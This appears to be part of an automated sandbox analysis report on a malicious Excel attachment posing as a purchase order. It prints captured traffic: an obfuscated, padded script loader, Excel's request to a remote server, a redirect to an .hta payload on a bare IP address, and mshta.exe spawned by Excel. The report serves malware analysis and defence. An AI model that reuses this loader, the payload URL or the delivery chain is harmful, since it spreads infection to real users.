                Data Raw: 3c 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 76 61 72 20 64 20 3d 20 75 6e 65 73 63 61 70 65 28 22 25 33 36 25 33 36 25 33 31 25 33 37 25 33 39 25 36 32 25 36 34 25 33 30 25 33 32 25 33 31 25 33 31 25 36 32 25 36 33 25 36 33 25 33 39 25 33 39 25 32 30 25 36 34 25 32 38 25 33 33 25 32 37 25 33 38 25 33 64 25 33 34 25 32 39 25 36 33 25 34 63 25 35 38 25 35 31 25 35 30 25 32 32 25 30 61 25 32 30 25 35 31 25 34 39 25 35 38 25 34 35 25 36 33 25 34 63 25 35 38 25 35 38 25 35 34 25 37 30 25 34 39 25 35 35 25 35 39 25 34 64 25 35 61 25 32 31 25 36 35 25 33 63 25 37 30 25 33 39 25 32 35 25 37 30 25 32 37 25 35 33 25 35 31 25 35 34 25 34 35 25 35 38 25 34 64 25 34 36 25 35 30 25 34 39 25 36 35 25 36 33 25 34 37 25 35 33 25 35 32 25 35 38 25 34 39 25 35 32 25 35 38 25 32 31 25 36 35 25 32 64 25 32 39 25 32 31 25 32 39 25 35 31 25 35 39 25 35 30 25 34 35 25 35 38 25 34 39 25 32 64 25 32 39 25 37 62 25 36 35 25 36 33 25 32 32 25 30 61 25 32 30 25 34 63 [TRUNCATED]
                Data Ascii: <script>...(function() { var d = unescape("%36%36%31%37%39%62%64%30%32%31%31%62%63%63%39%39%20%64%28%33%27%38%3d%34%29%63%4c%58%51%50%22%0a%20%51%49%58%45%63%4c%58%58%54%70%49%55%59%4d%5a%21%65%3c%70%39%25%70%27%53%51%54%45%58%4d%46%50%49%65%63%47%53%52%58%49%52%58%21%65%2d%29%21%29%51%59%50%45%58%49%2d%29%7b%65%63%22%0a%20%4c%58%51%50%22%0a%20%46%53%48%5d%22%0a%20%37%27%56%4d%54%38%63%30%25%52%4b%59%45%2b%49%21%65%5a%46%57%27%56%4d%54%58%65%22%0a%48%2d%51%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%0
                Jan 8, 2025 09:50:01.365473032 CET224INData Raw: 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39
                Data Ascii: 9%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%
                Jan 8, 2025 09:50:01.365482092 CET1236INData Raw: 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 35 61 25 35 36 25 35 36 25 35 34 25 34 38 25 35 39 25 35 61 25 32 38 25 33 61 25 35 30 25 34 65 25 33 35 25 33 35 25 33 30 25 35 30 25 35 32 25 33 65 25 33 38 25 33 63 25 33 32 25 33 30 25 35
                Data Ascii: 09%09%09%09%09%09%5a%56%56%54%48%59%5a%28%3a%50%4e%35%35%30%50%52%3e%38%3c%32%30%5a%5d%49%57%35%2c%2d%2a%5e%2a%4e%49%4e%54%37%45%35%5b%2c%53%53%28%3a%2d%31%28%4e%5b%46%4d%50%45%59%3b%5b%47%5d%58%59%2e%5a%55%2b%47%57%28%33%47%4f%34%3a%55%25%2f%
                Jan 8, 2025 09:50:01.365488052 CET1236INData Raw: 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30
                Data Ascii: 09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%
                Jan 8, 2025 09:50:01.365498066 CET1236INData Raw: 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30
                Data Ascii: 09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%
                Jan 8, 2025 09:50:01.365514040 CET672INData Raw: 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30
                Data Ascii: 09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%
                Jan 8, 2025 09:50:01.365530968 CET1236INData Raw: 35 61 25 35 36 25 35 36 25 35 34 25 34 38 25 35 39 25 35 61 25 32 38 25 33 61 25 35 30 25 34 65 25 33 35 25 33 35 25 33 30 25 35 30 25 35 32 25 33 65 25 33 38 25 33 63 25 33 32 25 33 30 25 35 61 25 35 64 25 34 39 25 35 37 25 33 35 25 32 63 25 32
                Data Ascii: 5a%56%56%54%48%59%5a%28%3a%50%4e%35%35%30%50%52%3e%38%3c%32%30%5a%5d%49%57%35%2c%2d%2a%5e%2a%4e%49%4e%54%37%45%35%5b%2c%53%53%28%3a%2d%31%28%4e%5b%46%4d%50%45%59%3b%5b%47%5d%58%59%2e%5a%55%2b%47%57%28%33%47%4f%34%3a%55%25%2f%48%2b%2e%56%48%4f%
                Jan 8, 2025 09:50:01.365542889 CET1236INData Raw: 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30
                Data Ascii: 09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%
                Jan 8, 2025 09:50:01.365554094 CET448INData Raw: 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30
                Data Ascii: 09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%6b%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%
                Jan 8, 2025 09:50:01.365573883 CET1236INData Raw: 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39
                Data Ascii: 9%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%0
                Jan 8, 2025 09:50:01.370456934 CET1236INData Raw: 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39
                Data Ascii: 9%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.245368114.103.79.104437048C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                TimestampBytes transferredDirectionData
                2025-01-08 08:50:00 UTC261OUTGET /fmGZaVnS?&bush=watchful&grandmom=adjoining&hackwork HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                Host: s.deemos.com
                Connection: Keep-Alive
                2025-01-08 08:50:00 UTC462INHTTP/1.1 302 Found
                Date: Wed, 08 Jan 2025 08:50:00 GMT
                Content-Type: text/plain; charset=utf-8
                Content-Length: 102
                Connection: close
                X-DNS-Prefetch-Control: off
                X-Frame-Options: SAMEORIGIN
                Strict-Transport-Security: max-age=15724800; includeSubDomains
                X-Download-Options: noopen
                X-Content-Type-Options: nosniff
                X-XSS-Protection: 1; mode=block
                Location: http://192.3.27.144/250/gse/begoodforeverythinggreatthingsformebetterforgood.hta
                Vary: Accept
                2025-01-08 08:50:00 UTC102INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 37 2e 31 34 34 2f 32 35 30 2f 67 73 65 2f 62 65 67 6f 6f 64 66 6f 72 65 76 65 72 79 74 68 69 6e 67 67 72 65 61 74 74 68 69 6e 67 73 66 6f 72 6d 65 62 65 74 74 65 72 66 6f 72 67 6f 6f 64 2e 68 74 61
                Data Ascii: Found. Redirecting to http://192.3.27.144/250/gse/begoodforeverythinggreatthingsformebetterforgood.hta


                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Click to jump to process

                Target ID:0
                Start time:03:49:02
                Start date:08/01/2025
                Path:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                Imagebase:0x7ff7a90e0000
                File size:70'082'712 bytes
                MD5 hash:F9F7B6C42211B06E7AC3E4B60AA8FB77
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate
                Has exited:false

                Target ID:13
                Start time:03:50:00
                Start date:08/01/2025
                Path:C:\Windows\System32\mshta.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\mshta.exe -Embedding
                Imagebase:0x7ff7a0360000
                File size:32'768 bytes
                MD5 hash:36D15DDE6D71802D9588CC0D48EDF8EA
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:false

                Target ID:15
                Start time:03:50:04
                Start date:08/01/2025
                Path:C:\Windows\splwow64.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\splwow64.exe 12288
                Imagebase:0x7ff798f30000
                File size:192'512 bytes
                MD5 hash:AF4A7EBF6114EE9E6FBCC910EC3C96E6
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate
                Has exited:false

                Target ID:21
                Start time:03:50:21
                Start date:08/01/2025
                Path:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PO#3311-20250108003.xls"
                Imagebase:0x7ff7a90e0000
                File size:70'082'712 bytes
                MD5 hash:F9F7B6C42211B06E7AC3E4B60AA8FB77
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate
                Has exited:true

                Call Graph

                • Entrypoint
                • Decryption Function
                • Executed
                • Not Executed
                • Show Help
                callgraph 1 Error: Graph is empty

                Module: Sheet1

                Declaration
                LineContent
                1

                Attribute VB_Name = "Sheet1"

                2

                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                3

                Attribute VB_GlobalNameSpace = False

                4

                Attribute VB_Creatable = False

                5

                Attribute VB_PredeclaredId = True

                6

                Attribute VB_Exposed = True

                7

                Attribute VB_TemplateDerived = False

                8

                Attribute VB_Customizable = True

                Module: Sheet2

                Declaration
                LineContent
                1

                Attribute VB_Name = "Sheet2"

                2

                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                3

                Attribute VB_GlobalNameSpace = False

                4

                Attribute VB_Creatable = False

                5

                Attribute VB_PredeclaredId = True

                6

                Attribute VB_Exposed = True

                7

                Attribute VB_TemplateDerived = False

                8

                Attribute VB_Customizable = True

                Module: Sheet3

                Declaration
                LineContent
                1

                Attribute VB_Name = "Sheet3"

                2

                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                3

                Attribute VB_GlobalNameSpace = False

                4

                Attribute VB_Creatable = False

                5

                Attribute VB_PredeclaredId = True

                6

                Attribute VB_Exposed = True

                7

                Attribute VB_TemplateDerived = False

                8

                Attribute VB_Customizable = True

                Module: ThisWorkbook

                Declaration
                LineContent
                1

                Attribute VB_Name = "ThisWorkbook"

                2

                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                3

                Attribute VB_GlobalNameSpace = False

                4

                Attribute VB_Creatable = False

                5

                Attribute VB_PredeclaredId = True

                6

                Attribute VB_Exposed = True

                7

                Attribute VB_TemplateDerived = False

                8

                Attribute VB_Customizable = True

                Reset < >